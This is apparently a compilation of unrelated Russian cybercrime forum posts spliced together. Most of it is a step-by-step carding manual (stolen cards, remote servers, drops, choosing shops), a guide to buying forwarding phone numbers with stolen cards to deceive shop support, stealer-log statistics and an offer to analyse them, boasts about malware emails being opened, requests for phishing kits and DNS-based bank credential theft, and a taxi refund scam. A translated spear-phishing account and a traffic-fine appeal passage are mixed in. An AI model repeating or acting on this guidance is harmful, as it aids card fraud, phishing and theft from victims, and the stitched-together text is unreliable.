'cua.gigared.com.ar': 4, 'pizzaforte.hu': 4, 'vjudge.net': 4, 'doublet.es': 4, 'sso.unila.ac.id': 4, 'mobion.bg.ac.rs': 4, 'is.rgf.bg.ac.rs:10333': 4, 'sacola.americanas.com.br': 4, 'my.forextime.com': 4, 'tigoonline.tigo.com.co': 4, 'webbanking.bancopan.com.br': 4, 'secure2.store.apple.com': 4, 'fonograma.lt': 4, 'auth.my.ge': 4, 'soundpark.online': 4, 'bitfun.co': 4, 'wad.ojooo.com': 4, 'tr.metin2.gameforge.com': 4, 'takipcihome.com': 4, 'tokopedia.com': 4, 'portal.kyk.gov.tr': 4, 'rageraid.org': 4, 'mymarket.ge': 4, 'esports.my.com': 4, 'mypremiercreditcard.com': 4, 'favc.com': 4, 'instagramtakipci.ist': 4, 'seritakipci.com': 4, 'takipstolk.com': 4, 'umutmedia.com': 4, 'aytarmedya.com': 4, 'hospedando.com.mx': 4, 'app.bind.com.mx': 4, 'login.partner.microsoftonline.cn': 4, 'ekampus.beun.edu.tr': 4, 'obs.beun.edu.tr': 4, 'safervpn.com': 4, 'secure.koodomobile.com': 4, 'fr.xhamster.com': 4, 'ww3.yggtorrent.is': 4, 'telescope.org': 4, 'hookers.nl': 4, 'usenet4all.eu': 4, 'admit.belgacom.be': 4, 'mwomercs.com': 4, 'phantompilots.com': 4, 'planningtool.contraste.com': 4, 'alternate.be': 4, 'secure.introlution.be': 4, 'sycro.com': 4, 'yplus.tv': 4, 'g7zGEnZipieE6ZyBA4Bz00kxU8h0F9QTwPLL-dnRVwngI0FJWJiD3rCEJsIQ_VK064SNdxzqggnnnAqT8LI89A==@com.android.settings': 4, 'metin2wars.ro': 4, 'emlaksatan.com': 4, 'superonline.net': 4, 'computrabajo.com.ec': 4, 'yts.re': 4, 'maybank2u.com.my': 4, 'sp0m.com': 4, 'file-up.org': 4, 'schoolexams.britishcouncil.org': 4, 'deapvirtual2.sea.sc.gov.br': 4, 'formulario.inpi.gov.br': 4, 'sabra.forumegypt.net': 4}
Вырезал все домены, которые меньше чем в 4-ех логах указаны с логином и паролем.
Основная идея статьи - это дать понимание и практическую реализации концепции того, что можно не раскрывая чувствительных данных сложить полное представление о логах, где на каких сайтах человек активен, его портрет пользователя спрогнозировать ценность этих логов.
Достаточно лишь запаковать в архив все файлы Information.txt и Software.txt и отправить мне для анализа и получить резюме в виде картинки, которую я привел выше и дополнительных текстовых данных, если это необходимо.
Благодарю за внимание!
В памяти о старичках, уважаю, открыт к дискуссии и обсуждению.
С заботой о новичках, позволяю переписать код руками, для более лучшего
усваивания, весь исходный код приведен в статье!
Кому принципиально важно наличие 1-click Run исходников в архиве - пришлю лично в ПМ, тем, кто проголосует за эту статью на конкурсе.
Все выигранные в конкурсе деньги благодаря вашим голосам за мои статьи - пойдут на создание одного из онлайн-сервисов для форума и форумчан. Предложения принимаются.
Доброго дня, наткнулся на одном из форумов, человечка, который предлагал софт, якобы пере- / подбирающий, генерирующий из определенного диапазона, номера карт не привязанные к какому-либо номеру телефона. Мы договорились об тестовом осмотре и в дальнейшем покупке, если все будет как заявлено продавцом.
Но, первое что меня смутило (да, мы общались в ТГ и это, наверное, сразу было
показателем), вырезанные из контекста другой переписки фразы, выданные мне как
мануал.
Далее, открыв линк на ЯндексДиск, пробежал глазами по со держимому, увидел
файл с названием "RemoteExecuteScriptSilent.exe", спросил у товарища, мол,
"что это?". Тот сразу пропал.
(так и не отвечает, до сих пор)
Закинул весь архив на VT, 1 детект.. мне как-то это внушило уверенности и...
я запустил это дерьмо. Но, не знаю, к лучшему это или нет, но прервал
"установку" на ~20%..
Spoiler: Линк на это дерьмо.
https://yadi.sk/d/-S7gxlvqWYdrzw
Господа, прошу не кидаться ссаными тряпками, а попрошу лишь несколько советов:
. как мне понять что это такое на самом деле?
. как мне в дальнейшем быть уверенным при выборе / использовании софта?
. в каких условиях работать с подобной грязью?
Или я все-таки ошибаюсь и обливаю грязью добропорядочного человека, только из- за своей безграмотности?
Всех приветствую.
Нуждаюсь в софте\сервисе\скрипте, для рассылки писем по N базе email адресов.
В письме текст+ссылка.
Пробовал mailchimp. Как итог - банили рассылку.
Если есть какие либо аналоги - посоветуйте.
Объемы мне нужны не большие, от 100 до 1000. (в день)
Подойдёт как платный, так и бесплатный вариант.
Ну и дабы не кликбейтить названием - вот что по поводу конверта:
Потестил немного ручками. (Рассылал вручную, через ящик на protonmail.)
Из 25 писем - отстучало 5 (запустили файл) хвастаюсь
Мануал покупался в складчину за 300$ на еще живом Уолл Стрит Маркете.
В основном инфа по тикетам + самореги + Информационная Безопасность. Актуально
для новичков
[CLIKE]
Пароль - xss
https://yadi.sk/d/y5erg0Ia_kp6Jw
[/CLIKE]
P.S. мануал на английском
Основные заблуждения.
1. Хочу все и сразу.
Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стаф, здесь все есть. Также статейка по общим понятиям по заливам есть.
2. Безопасность. Меня посадят.
Одна из главных проблем новичка - это боязнь, что его посадят. Почему-то думает, что он сразу начнет зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, причем используешь не сокс, а именно дедик, который имеет наибольшую анонимность.
Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН, ВПН
3. Легкие деньги.
Возможно, ты уже знаешь, что все продавцы дампа+пина это все лохотрон. А если нет, то предупреждаю деньги за деньги никто не продает, чудеса возможны только в стране дураков.
Предисловение. Куда можно вбить и как на этом заработать.
1. Шопы. Плюсы: относительно легко найти шлющий шоп. Минусы: шопы быстро помирают, маленький % чистого дохода от вбива. Как искать шопы и как анонимно принимать стаф есть в материалах.
2. Свой мерчант счет. Плюсы: доход от вбива до 95%. Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом. Как открыть свой мерчант счет есть в материалах.
3. Брокерские конторы, типа форекс и биржи. Вбивать СС смысла нет, но можно купить с логов такие аккуанты и открыть счет на дропа с таким, же именем и фамилией, как у холдера и слить все деньги на дропа.
4. Покер аккуанты и конторы со ставками на спорт. Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. Тема по выводу есть в материалах.
5. Мобильные операторы. Скажу сразу, что в СНГ операторов вбить не получится, не спорю такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.
6. Онлайн игры. На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счет игры не поступят, если придут, то быстро локнут аккуант. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пайпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.
7. Платежные системы. Не стоит вбивать в пайпел, хотя бы, потому что цены на аккуанты доступны, также нет смысла вбивать в манибукерсы (скрил) эта платежка больше себя позиционирует для оплаты товаров и услуг, нежели для расчетов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.
8. Остальное. Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д. 1 правило вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.
Поздравляю тебя, ты сделал верный шаг на встречу к большим деньгам. Можно было полгода и более потратить на самообучение, ни один раз обжечься и начать зарабатывать деньги или вовсе разочароваться и бросить это дело. А можно прочесть эту статью до конца, осознать все и не просто хорошо зарабатывать, а начать косить бабло.
Когда человек далекий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с одно СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. все упирается в лимиты.
Деньги с СС можно перевести на счет казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в следующих статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрет на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе все накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.
Забегая вперед, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдергивают логи с банковскими аккуантами и сливают на своих дропов, а все то, что продают это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идет транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.
Теперь спустимся на более реальную землю, заливы это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десяток долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место вещевуха. Вбиваем стаф на дропа и получаем свой процентик. Один шоп, это по сути одна тема по сливу, если задрочить помрет также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый, это отсев, подробнее можно прочить в статье ищем шоп, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлет ли шоп вообще. Если придерживаться данной последовательности, отошлют стаф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стафер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берем не по верхней планке. 600$ - усредненная стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.
Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности - дропы, платежные системы и, разумеется, большие деньги .
Но в итоге все сводится к одному - извлечению из виртуальных карточек вполне
реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc > WM” я не
дам. Таких просто не существует. Многих новичков обманывают именно таким
способом, потому что любого человека, только пришедшего в кардинг, будет
терзать мысль: «Как же мне поскорее обналичить
кредитную карту в WM и поиметь много $?»
_Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит
в среднем $2-3.
WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper.
Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.
На hostonce практически не проверяют cc, и сайт никогда не закроют._
Вбив.
Скардить товар не намного сложнее, если покупать его за свои деньги. По сути скопировал данные сс, вставил в окошки и профит, ничего сложного, это так и есть, а теперь ближе к делу.
Что нужно для успешного вбива?
- Материал. СС и Дедик, дедик берем сразу под штат СС.
- Шоп. Шопы шлют ВСЕ, иначе интернет-магазинов просто бы не существовало. Отличие лишь в том, что к каждому нужен свой подход, одни не шлют в отдельные страны вовсе, другие не шлют на большие суммы, третьи не шлют, потому что сс без vbv кода и т.д.
По шагам.
1. Покупаем СС, лучше без vbv кода. На заметку: 1. Есть шопы, которые не просят vbv код, даже если СС с кодом. 2. Если вбивать электронику, то с вероятностью 98% без vbv кода вбить СС не прокатит, т.е. придется покупать только с vbv.
2. Покупаем дедик под штат СС.
3. Ищем шоп. Если есть шоп, пункт пропускаем. Хитрости поиска шопов есть в материалах.
4. Регистрируем почту. Регистрируем в зоне com, с абстрактным названием чтобы сошло для женщины и для мужчины, например, watercould98, likechokоlade и т.п.
5. Заходим на дедик.
6. Вбиваем. ну и все) Важный момент шипинг и билинг адресов. Здесь нужно экспериментировать или узнавать у саппорта шлет ли на отличный биллинг или нет. Есть шопы, в которых указываешь одинаковый билинг и шипинг адрес причем сразу дропа, данные сс не меняешь, т.е. идет соответствие адресов, но нет проверки адреса и холдера. Самые удобные шопы для вбива)
Чтобы шоп слал на одного дропа несколько раз можно менять местами имя и фамилию, делать 2-3 ошибки в имени, также указываем адрес соседа.
Любые проблемы лучше решать, написав сразу саппорту, что и почему не проходит оплата, они ответят и если повезет, за тебя сами проведут оплату.
Вещевой кардинг
Вещевой кардинг получил наибольшее распространение среди кардеров. Его суть заключается в заказе товаров в интернет-магазинах по чужим кредитным картам с целью последующего сбыта.
Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих
начинающих кардеров, которым все кажется понятным и простым. На самом деле
заниматься вещевым кардингом не так легко. Чтобы получать доход, нужна цепочка
людей, которые будут слаженно работать.
ЗАКЛЮЧЕНИЕ- ПОНРАВИЛАСЬ СТАТЬЯ?ПРОДОЛЖАТЬ?!
Сборник книг по СИ от А до Я
Hidden content for authorized users.
ODYZEKNoQNOVgo4)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
Источник: exploit.in
На експе с 2012 года
слив мануала по созданию саморегов страйпа и заливу в них с последующим
выводом
[CLIKE]
](https://mega.nz/#!dQ1TBALA!ITarlPBVjhNicMGWHnWTJqxkWbierAAKSc4jbFtQ1x8)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
Здравствуйте, сегодня я расскажу как получить реальный номер почти любой страны за сс либо палку. Для многих это будет повтор пройденного, для кого-то что-то новое.
tollfreeforwarding.com - отличный сайт, который предоставляет услуги переадресации номера. Суть следующая - вы выбираете номер почти любой страны, вписываете номер на который будет переадресация (может быть сип/воип) и вбиваете сс.
****
Всё достаточно просто, процедура следующая :
1) Как всегда, покупаем сс, чекаем на валид
2) Берём носок под город холдера, входим на сайт, выбираете желаемый номер.
3) Вводим номер на который будет переадресация в поле "Enter your existing number".
4) Кликаете Activate Now, для инстант активации регаем любое мыло с нестандартным доменом тут: mail.com, к примеруcall@usa.com
5) Вбиваете либо сс либо оплачиваете палкой, далее всё стандартно, номер активируют.
У новичков может возникнуть вопрос, что делать дальше после того как скардили номер на tollfreeforwarding.com.
Есть два решения проблемы:
1 купить телефон+много левых сим карт, и каждый раз привязывать.
2 Привязать к Voip(Voice over IP) сервису, проще и не надо симки искать.
С 1 вариантом все понятно, со вторым вариантом могут возникунть вопросы, где взять Voip аккаунт.
Собственно, порядок действий :
1.Микрофон+сс+сокс под холдера.
2. Топаем на сайт sipthor.net
3. Регистрируемся.После регистрации вы получите свой сип адресс выглядеть он будет примерно так :olololo@sip2sip.info.
4. Скачиваем софтофон sip2sip.info, устанавливаем его, и вводим данные которые ввели/получили на сайте sipthor.net, ждем пока программа клиент подключится к данному сервису.
5.Далее идем по данной ссылке mdns.sipthor.net/sip_settings.phtml (нас перекидывает на страницу ввода пароля и никнейма), вводим свои данные, и попадаем в свой аккаунт.
6. Идем в графу refill balance , и собственно туда вбиваем сс на 20-30 баксов(оплата проходит без проблем)
7. Идем в сип клиент который вы установили, и пытаемся позвонить по контактам которые там есть(это тестовые, если все норм, то вы счастливый обладатель VOIP Телефона)
8. Идем на tollfreeforwarding.com и ставим переадресацию с обычного номера на наш СИП аккаунт. Теперь, когда будет идти звонок на нормальный адресс, он будет переадресован прямо вам на компьютер, где вы спокойно уже можете поговорить с саппом шопа и успокоить его.
**
**
© copyright
I need someone to make a phishlet (Evilginx2) or a phishing template (Modlishka) for me. PM me for more info. The job will be well paid..
Всем доброго времени суток.Вопрос:Кто расскажет поподробнее про это этот инструмент?В том смысле,как дальше то?.Да я знаю как генерировать и,что потом выходитдомен.Так вопрос собственно вот в чем:Как это потом в дальнейшем использовать? Я много присматривался к этому инструменту и понял,что в фишинге просто мощная вещь.Не могу понять только как мне сгруппировать с дальнейшими действиями.Если setoolkit понятен принцип,а тут показан,что генерирует и все.Или я не так чего то понимаю? Спасибо.Особо не критикуйте ток!)
З.ы Вот о каком инструменте я имею в виду если кто не понял!) https://github.com/UndeadSec/EvilURL
кто поможет создать фишинговый сайт вк
Как можно обналить пластик не имея пинкода?
(полагаю,что разные сервисы онлайн оплаты с карты, но надо именно кэш)
у меня раковина(минимум-права-не права локального администратора) на потерпевшую с банковского счета, мои равнины, когда высок ввести банковские URL в браузере, чтобы перенаправить его в мой фейковый сайт, и черная его один раз пароль и скажи ему, чтобы попробовать еще раз в 10 мин, чтобы украсть еще один раз пароль для подтверждения транзакции, я смотрю вокруг и читаю много переадресация DNS-спуфинга также знать о bettercap, но ничего не работает, если кто-то есть решение, я могу заплатить за это
Как ездить на такси бесплатно?
Впереди выходные, несущие с собой отдых и стойкое нежелание садиться за руль?
Тогда я подскажу вам, как добывать промокоды на Яндекс Такси в практически
безграничном количестве (Убер и прочие сервисы еще не пробовал, но по аналогии
Итак, схема очень проста: вызываем и едем, куда нам нужно. По завершении поездки ставим 1 звезду, заходим в раздел тех.поддержки приложения и начинаем ссать им в уши подобной историей:
[CLIKE]"ВЫ ХОТЬ ПРОВЕРЯЕТЕ ТЕХ, КОГО НАНИМАЕТЕ НА РАБОТУ!? До сих пор не могу отойти от последней поездки - водитель всю дорогу курил сигареты, хотя я и просил его немного потерпеть, ведь у меня АСТМА, но кучеру было пофиг! Через полсигареты мне стало плохо - начался приступ удушья, на что водитель отреагировал совсем НЕАДЕКВАТНО: сказал, что я симулирую, и что отпздит меня, если я не прекращу! Слава б-гу, я взял с собой ингалятор, иначе бы умер из-за вашего говносервиса!"[/CLIKE]
Естественно, ваша история должна отличаться от моей. Можно также давить на то, что водитель превышал скоростной режим, чуть не сбил пешехода, был пьян и тп. Главное - не повторять одну и ту же причину дважды, и все будет в шоколаде.
Всё. Ждите извинений от саппорта и промокод на 150-200 рублей
П.С.: как бы смешно это не звучало, но в техподдержку с такими заявлениями вы можете писать хоть после каждой поездки. Саппорту, мягко говоря, похер на то, что вы со всеми сретесь, как бабка в поликлинике - при адекватном исполнении промокод вам все равно дадут.
Три недели назад я получил очень лестное письмо из Кембриджского университета с предложением выступить судьёй на премии Адама Смита по экономике:
Дорогой Роберт,
Меня зовут Грегори Харрис. Я один из Организаторов премии Адама Смита.
Каждый год мы обновляем команду независимых специалистов для оценки качества конкурирующих проектов: http://people.ds.cam.ac.uk/grh37/awards/Adam_Smith_Prize
Наши коллеги рекомендовали вас как опытного специалиста в этой области.
Нам нужна ваша помощь в оценке нескольких проектов для премии Адама Смита.
Ждём вашего ответа.
С наилучшими пожеланиями, Грегори ХаррисClick to expand...
Я бы не назвал себя «экспертом» по экономике, но запрос университета не
казался чем-то невероятным. У меня есть подписка на The Economist , и я
понимаю — очень грубо — как и почему центральные банки устанавливают
процентные ставки. Я читал «Капитал в двадцать первом веке» и в основном понял
суть первой половины. [Несколько](https://robertheaton.com/2018/06/05/why-
economists-need-bureaucracy/)
[постов](https://robertheaton.com/2019/03/17/robert-prove-that-your-
randomized-trial-really-was-random/) в
[моём](https://robertheaton.com/2019/02/24/making-peace-with-simpsons-
paradox/) [блоге](https://robertheaton.com/2019/03/31/the-robot-reserve-army-
of-labor/) помечены тегом «экономика». Возможно, я могу внести некий вклад в
новую дисциплину вычислительной экономики. В целом казалось вполне вероятным,
что организаторы премии Адама Смита захотят услышать мою точку зрения. Я
предполагал много неоплачиваемой работы, но всё равно предложение было очень
приятным.
Тем не менее, в глубине души я чувствовал, что возникло некое недопонимание.
Вдруг меня — Роберта Хитона — перепутали с каким-нибудь профессором Хобертом
Ритоном из Калифорнийского университета в Сан-Диего, специалистом по торговой
теории Хекшера — Олина, который терпеливо ждёт возможности продолжить карьеру
через трансатлантическое сотрудничество. Тем не менее, я решил потянуть за эту
ниточку и слегка пощекотать фантазию.
Рефлекторно я выполнил некоторые базовые проверки безопасности. Письмо было
отправлено с адреса @cam.ac.uk
. Я навёл мышь на ссылку в письме —
http://people.ds.cam.ac.uk/grh37/awards/Adam_Smith_Prize
. Она указывала на
тот же URL, что и в тексте, на валидном поддомене cam.ac.uk. Мне показалось
немного странным, что страница размещена в личном каталоге grh327 вместо
страницы факультета экономики; но ладно уж, вероятно, так меньше бюрократии. Я
пошёл по ссылке и немного почитал об истории премии Адама Смита.
Если бы «Грегори» добавил на эту страницу всего семь дополнительных слов: «Страницу следует просматривать в браузере Mozilla Firefox» — я бы точно облажался. Но об этом позже.
Затем я зашёл на главную страницу cam.ac.uk и убедился, что это действительно домен Кембриджского университета. Я быстро погуглил «Грегори Харриса из Кембриджа», но мало что нашёл. Смутно помню какую-то учётную запись LinkedIn. Но это нормально, не у каждого есть профиль в Twitter или кулинарный блог.
Помню, что письмо Грегори показалось мне очень коротким и плохо сформулированным. Я ещё подумал, что ему неплохо бы взять несколько уроков, как эффективно просить незнакомцев в интернете делать для него бесплатную работу. Ему повезло, что меня не волновали такие мелочи. Ему также повезло, что мне было всё равно, что он пропустил “the” в предложении We need your assistance in evaluating several projects for Adam Smith Prize. Видимо, меня также не волновало, что он написал «Организаторы» с заглавной буквы и что он, похоже, не понимает, что абзац может содержать больше одного предложения.
В то время я просто думал, что он не очень хороший писатель.
Я послал Грегори короткий ответ, предварительно выразив интерес и попросив предоставить дополнительную информацию.
Здравствуйте, Грегори,
Спасибо за ваше письмо. Конечно, мне интересно. Не могли бы вы рассказать немного больше о том, что для этого нужно и кто меня рекомендовал?
Всего лучшего, РобClick to expand...
Грегори быстро ответил — я был в деле!
Здравствуйте, Роб,
Спасибо за быстрый ответ.
Ваша кандидатура была в списке кандидатов, который мы получили от Университе́та штата Калифорния в Сан-Франци́ско.
Мы вышлем вам описание нескольких проектов и список вопросов и критериев для их оценки.
Думаю, план будет готов к середине июня.
С наилучшими пожеланиями, ГрегориClick to expand...
Я начал чувствовать себя словно какой-то обманщик. Бедняга Хоберт Ритон сидит в своём офисе в Сан-Диего в полном одиночестве и удивляется, почему никто не приглашает его судьёй на конкурс. Я решил поделиться своими сомнениями со своим новым другом Грегори, не скрывая сомнений в своих навыках. Если он всё равно захочет взять меня на конкурс, то это не моя вина.
Здравствуйте, Грегори,
Я начинаю думать, вдруг возникла какая-то путаница. Я прочитал несколько книг Пола Кругмана, но никогда не изучал и не занимался экономикой. Я инженер-программист — это моё занятие и образование (https://www.linkedin.com/in/robertjheaton/). Что вы думаете на этот счёт? Может быть, в Сан-Франциско есть ещё один Роберт Хитон, который знает немного больше об экономике?
РобClick to expand...
Однако Грегори согласился (быстрее, чем я надеялся), что, возможно, произошла ошибка.
Здравствуйте, Роб,
Да, возможна ошибка. Я проконсультируюсь с коллегами и вскоре свяжусь с вами.
С наилучшими пожеланиями, ГрегориClick to expand...
Это было последнее, что я слышал от Грегори Харриса. Казалось, что на этом история закончена.
Но в пятницу пришло письмо от Coinbase:
Здравствуйте,
Возможно, вы недавно получили электронное письмо от человека по имени Грегори Харрис или Нил Моррис, выдающих себя за организаторов конкурса Кембриджского университета. Это поддельные профили, принадлежащие продвинутому злоумышленнику, который пытается установить вредоносное ПО на ваш компьютер...Click to expand...
Если подумать, это действительно имело смысл.
Я чуть не стал жертвой технически продвинутой кампании по таргетированному
фишингу. Насколько я могу понять (это нигде явно не писали, и я вполне могу
ошибаться), злоумышленники скомпрометировали учётные записи электронной почты
и веб-страницы в Кембриджском университете, принадлежащие двум людям по имени
«Грегори Харрис» и «Нил Моррис». Затем использовали эти учётные записи для
проведения кампании по фишингу с целью подтолкнуть каждую жертву посетить одну
из двух скомпрометированных страниц, размещённых на
http://people.ds.cam.ac.uk
. Если жертва использовала браузер Firefox, то
вредоносный Javascript на странице использовал 0-day уязвимость в
Firefox, которая позволяла
эксплоиту выйти за пределы песочницы в браузере и запустить вредоносное ПО
непосредственно в операционной системе.
Я беззаботно несколько раз переходил по ссылке, которую прислал «Грегори Харрис». К счастью, я использовал Chrome, поэтому JavaScript-эксплоит злоумышленников ничего не сделал. Но если бы злоумышленники сделали малость и добавили в начале страницы всего семь слов «Страницу следует просматривать в браузере Mozilla Firefox» — меня бы поимели. Я бы посмеялся над неумехами веб- разработчиками, которые до сих пор не реализовали базовую кросс-браузерную совместимость, и самодовольно скопировал бы ссылку в Firefox. Даже непонятно, почему злоумышленники так не сделали. Возможно, у них не было полного контроля над содержанием страницы или они старались действовать максимально тонко.
Изначально злоумышленники нацеливались на сотрудников криптовалютной биржи Coinbase. Но вскоре расширили кампанию на более широкую аудиторию людей, предположительно связанных с криптовалютой. Вероятно, они хотели похитить наши сладкие неотслеживаемые кусочки блокчейна. В любом случае, им не повезло, потому что я никогда не владел никакой криптовалютой, кроме нескольких стелларов, которые получил бесплатно и забыл пароль. Если бы они или какие-то другие злоумышленники помогли их вернуть, я был бы очень благодарен.
Обладая двумя настоящими профилями, 0-day уязвимостью Firefox и списком адресов электронной почты людей, связанных с криптовалютой (плюс я), злоумышленники приступили к работе. Они безжалостно эксплуатировали слегка раздутое самомнение невинных людей в своих способностях и важности — и заражали трояном каждого, кто открывал ссылку в Firefox на MacOS. Уязвимости Firefox теперь исправлены, а веб-страницы из фишинговых писем удалены. Но я удивлюсь, если хотя бы несколько человек не попали на парочку сатоши или на миллиард.
Не уверен, какую роль в этой истории играет Кембриджский университет. Не знаю, являются ли «Грегори Харрис» и «Нил Моррис» реальными людьми, чьи университетские аккаунты были скомпрометированы, или это фейковые личности, созданные тем, кто скомпрометировал всю университетскую вычислительную систему, или я просто совершенно не понимаю, что произошло. На всякий случай не хочу публично совать нос в онлайновую жизнь Грегори или Нила, если это реальные люди, но сильно подозреваю, что это всё-таки фейковые аккаунты. Это абсолютно безосновательное предположение, как и всё последующее, так что если вы работаете в Кембриджском университете, прошу не направлять в меня лучи ненависти. Пожалуйста, расскажите, что произошло на самом деле.
Я не смог найти в онлайне никаких следов Грегори Харриса или Нила Морриса, кроме их предполагаемых профилей LinkedIn. Ещё раз, это нормально. Не каждый ведёт Instagram или пишет фанфики Star Wars. Тем не менее, LinkedIn-профиль Грегори Харриса недавно удалён — он по-прежнему появляется в поиске Google, но не доступен в LinkedIn. И хотя профиль Нила Морриса всё ещё там, это наверняка подделка.
На первый взгляд, профиль Нила выглядит достаточно разумно.
Но быстрый поиск Google показывает, что описание скопировано из другого профиля LinkedIn.
Для меня этого достаточно, чтобы подтвердить подозрения. Но если посмотреть ближе, обнаружим ещё несколько забавных деталей:
Нил, если вы существуете и это ваш реальный профиль LinkedIn, то прошу прощения. Но если вы такой реальный человек, то зачем скопировали чужое самоописание?
Не думаю, что с моей стороны было оплошностью нажать на ссылку в фишинговом
письме. Эксплоит для 0-day уязвимости браузера на поддомене cam.ac.uk
не
входит в мою личную модель угроз, и я думаю, что это разумно. Безопасность
следует балансировать с прагматизмом. Невозможно всё в мире подписать GPG-
подписью в сети доверия, которая ведёт к Брюсу Шнайеру. Впрочем, мой
твиттер уже готов к желчной критике этого
утверждения, в личных сообщениях.
Тем не менее, этот эпизод оставил чувство невероятной неловкости. Хотя история заканчивается благополучно, я всё равно попался на крючок фишинг-атаки, и практически заглотил наживку. Мне просто повезло, что вектором атаки была 0-day для программного обеспечения, которое я не использую, а не что-то более заурядное. Если бы обмен письмами немного продолжился, вероятно, я бы включил макросы для документов Microsoft Office, которые прислал Грегори Харрис, и мог бы даже запустить программу, которую он прислал, если бы он сказал, что это часть процесса регистрации. Как я уже упоминал, у меня нет криптовалюты, но есть деньги на счетах в интернет-банке, которые вообще-то желательно сохранить.
Не знаю, какова мораль этой истории. Наверное, главный вывод в том, что следует сохранять бдительность при общении с незнакомцами в интернете, даже если у них легитимные адреса электронной почты c валидными DKIM-подписями. Кроме того, очень легко упустить из внимания большое количество несоответствий и странностей, если вы верите в чью-то историю, особенно если эта история вам приятна. Оглядываясь назад, совершенно абсурдно было поверить, что Кембриджский университет пригласит меня судьёй на экономический конкурс, а перечитывая электронную почту Грегори Харриса, сразу видно, что это не профессионал по онлайн-коммуникациям. Но я не думал критически и был убаюкан ложным чувством безопасности из-за почты с адреса @cam.ac.uk и собственного эго.
И последняя мораль. Дважды подумайте, прежде чем скромно (и нескромно тоже) рассказывать окружающим, что вас пригласили судить премию Адама Смита по экономике.
Автор: Robert Heaton
<https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-
phished/>
Если вам пришел конверт из центра видеофиксации, вы можете в соответствии с
ч.2 ст. 2.6.1 КоАП РФ быть освобождены от
ответственности — если в ходе рассмотрения выяснится (будет подтверждено,
доказано), что на момент фиксации автомобилем управляли не вы.
Поэтому в любом случае надо обжаловать постановление.
Обычно подтверждением служит договор аренды, где указано следующее:
ответственность за штрафы, полученные в период
действия договора, в т. ч, полученные с помощью устройств
фотовидео фиксации, ложится на арендатора.
Если такая строка есть — то постановление по делу об
административном правонарушении должно быть отменено,
а производство по нему прекращено (ч.2 ст. 30.7 КоАП РФ).
В соответствии со ст. 30.1 КоАП РФ постановление,
вынесенное ГИБДД, может быть обжаловано в районном суде
по месту нахождения отдела ГИБДД (смотрите адрес на
конверте, откуда пришло — и через интернет определяете
районный суд) Плюс можно еще жалобу вышестоящему лицу отправить.
Важно, чтобы вы были вписаны в страховку или она должна быть неограниченная.
А теперь по порядку, срок привлечения к административной
